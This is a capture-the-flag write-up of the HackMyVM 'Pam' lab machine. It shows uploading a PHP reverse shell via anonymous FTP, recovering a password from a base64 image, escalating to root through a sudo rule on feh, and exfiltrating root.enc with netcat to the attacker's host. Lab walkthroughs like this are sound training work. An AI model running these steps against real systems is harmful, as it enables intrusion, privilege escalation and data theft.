NOTES ABOUT Pam
[ 2022-10-08 ] [ HackMyVM / Pam ]Status: Rooted
Skills: Port Scanning, FTP, Cryptography, Sudo
Tools: nmap, nc, openssl, ftp
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.18
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0
GETTING IN
FTP ANONYMOUS LOGIN
SEARCHING WRITABLE DIRS
$ lftp -u anonymous,anonymous -e 'find -l /var/www/html;bye' 10.0.2.18 | grep "d.w..w..w."
drwxrwxrwx 33/33 4096 2022-05-02 17:46:30 /var/www/html/phpipam/app/admin/import-export/upload/
drwxrwxrwx 33/33 4096 2022-05-02 17:46:30 /var/www/html/phpipam/app/subnets/import-subnet/upload/
REVERSE SHELL UPLOAD
ftp> cd /var/www/html/phpipam/app/admin/import-export/upload/
250 Directory successfully changed.
ftp> put rs.php
local: rs.php remote: rs.php
ftp> chmod 777 rs.php
200 SITE CHMOD command ok.
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.18] 43796
Linux pam 5.10.0-17-amd64 #1 SMP Debian 5.10.136-1 (2022-08-13) x86_64 GNU/Linux
21:52:34 up 1:20, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: cant access tty; job control turned off
http://10.0.2.18/phpipam/app/admin/import-export/upload/rs.php
ELEVATING PRIVILEGES
$ ps -aux
[...]
italia 401 0.0 0.0 2420 524 ? Ss 20:32 0:00 /bin/sh -c /usr/bin/php -q /home/italia/pazz.php
italia 409 0.0 2.6 89000 26360 ? S 20:32 0:00 /usr/bin/php -q /home/italia/pazz.php
[...]
LOCAL POR SCAN WITH NETCAT
$ nc -zvn 127.0.0.1 1-65535
(UNKNOWN) [127.0.0.1] 46800 (?) open
(UNKNOWN) [127.0.0.1] 12345 (?) open
(UNKNOWN) [127.0.0.1] 3306 (mysql) open
(UNKNOWN) [127.0.0.1] 80 (http) open
(UNKNOWN) [127.0.0.1] 21 (ftp) open
PORT CONNECT
nc 127.0.0.1 12345
hi
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Version: 13
Sec-WebSocket-Accept: Kfh9QIsMVZcl6xEPYxPHzW8SZ8w=
iVBORw0KGgoAAAANSUhEUgAAAu4AAAHUCAIAAADqdjrLAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAABiKSURBVHhe7d3rdeLIFoDRicsBOR5H42QczL2S
kN0YTj0klcCHtfefmXFDqVSwVN/QgP/7HwBAWlIGAEhMygAAiUkZACAxKQMAJCZlAIDEpAwAkJiU
AQASkzIAQGJSBgBITMoAAIlJGQAgMSkDACQmZQCAxKQMAJCYlAEAEpMyAEBiUgYASEzKAACJSRkA
IDEpAwAkJmUAgMSkDACQmJQBABKTMgBAYlIGAEhMygAAiUkZACAxKQMAJCZlAIDEpAwAkJiUAQAS
kzIAQGJSBgBITMoAAIlJGQAgMSkDACQmZQCAxKQMAJCYlAEAEpMyAEBiUgYASEzKAACJSRkAIDEp
AwAkJmUAgMSkDACQmJQBABKTMgBAYlIGAEhMygAAiUkZACAxKQMAJCZlAIDEpAwAkJiUAQASkzIA
QGJSBgBITMoAAIlJGQAgMSkDACQmZQCAxKQMAJCYlAEAEpMyAEBiUgYASEzKAACJSRkAIDEpAwAk
JmUAgMSkDACQmJQBABKTMgBAYlIGAEhMygAAiUkZACAxKQMAJCZlAIDEpAwAkJiUAQASkzIAQGJS
BgBITMoAAIlJGQAgMSkDACQmZQCAxKQMAJCYlAEAEpMyAEBiUgYASEzKAACJSRkAIDEpAwAkJmUA
gMSkDACQmJQBABKTMgBAYlIGAEhMygAAiUkZACAxKQMAJCZlAIDEpAwAkJiUAQASkzIAQGJSBgBI
TMoAAIlJGQAgMSkDACQmZQCAxKQMAJCYlAEAEpMyAEBiUgYASEzKAACJSRkAIDEpAwAkJmUAgMSk
DACQmJQBABKTMgBAYlIGAEhMygAAiUkZACAxKQMAJCZlAIDEpAwAkJiUAQASkzIAQGJSBgBITMoA
AIlJGQAgMSkDACQmZQCAxKQMAJCYlAEAEpMyAEBiUgYASEzKAACJSRkAIDEpAwAkJmUAgMSkDACQ
mJQBABKTMgBAYlIGAEhMygAAiUkZACAxKQMAJCZlAIDEpAwAkJiUAQASkzIAQGJSBgBITMoAAIlJ
[...]
BROWSE BASE64 REPLAY:
data:image/jpeg;base64,iVBORw0KGgoAAAANSUhEUgAAAu4AAAHUCAIAA[...]
IMAGE DATA:
rootisCLOSE
-aes-256-cbc
ITALIA PAZZ IT SAYS:
$ su italia
Password: rootisCLOSE
id
uid=1000(italia) gid=1000(italia) grupos=1000(italia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev) 108(netdev)
$ cd /home/italia
$ cat user.txt
ROOT
$ sudo -l
Matching Defaults entries for italia on pam:
[...]
User italia may run the following commands on pam:
(ALL : ALL) NOPASSWD: /usr/bin/feh
$ man feh
[...]
-A, --action [flag][[title]]action
[...]
The action will be executed by /bin/sh. Use format specifiers to
refer to image info, see FORMAT SPECIFIERS for details. Example
usage: "feh -A "mv %F ~/images/%N" *".
[...]
-u, --unloadable
Don't display images. Just print out their names if imlib2 can
NOT successfully load them. Returns false if at least one image
was loadable.
[...]
$ sudo /usr/bin/feh -uA id
./initrd.img
uid=0(root) gid=0(root) grupos=0(root)
$ sudo /usr/bin/feh -uA /bin/bash
$ cd /root
$ ls -la
[...]
-rw------- 1 root root 48 ago 18 11:21 root.enc
[...]
$ cat root.enc
���6�`_91�0�3��s�@#���f
$ nc 10.0.2.15 443 < root.enc
$ nc -lvnp 443 >root.enc
$ file root.enc
root.enc: openssl enc\'d data with salted password
$ openssl enc -aes-256-cbc -d -in root.enc -out root.txt -k rootisCLOSE
init 0